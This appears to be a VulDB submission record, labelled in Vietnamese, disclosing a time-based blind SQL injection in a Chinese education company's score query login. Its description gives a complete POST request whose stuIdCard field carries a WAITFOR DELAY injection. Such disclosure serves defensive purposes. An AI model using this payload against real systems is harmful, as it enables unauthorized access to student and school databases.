| tiêu đề | 陕西蝉鸣教育科技有限公司SQL injection exists in the score query system |
|---|
| Mô tả | There is a time blind note in the user name of the system login
payload:
__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTg3ODE2MzAxOGRkjs5lCbkPfYcmPBDFCeTbdJEDUE40z03ahnrD6Cn6U9Q=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAASwlrAzUjIPJemzPlKXfWadM+J3jsP5r3X1sSgLaohSXGGcPOO2LAX9axRe6vMQj2HauvzlgfhlZODHSoB63VpKjRseRNtrMZdX79HgkvCMlmNn6WVF7UoOCb7l36e19Zg=&stuIdCard=';WAITFOR DELAY '0:0:5'--&txtpwd=111&btnLoginStu=%E7%99%BB%E5%BD%95 |
|---|
| Nguồn | ⚠️ https://github.com/Echosssy/-SQL-injection-exists-in-the-score-query-system/blob/main/README.md |
|---|
| Người dùng | Ting (UID 54907) |
|---|
| Đệ trình | 18/10/2023 12:02 (cách đây 3 những năm) |
|---|
| Kiểm duyệt | 26/10/2023 07:44 (8 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 243593 [Shaanxi Chanming Education Technology Score Query System 5.0 stuIdCard Tiêm SQL] |
|---|
| điểm | 20 |
|---|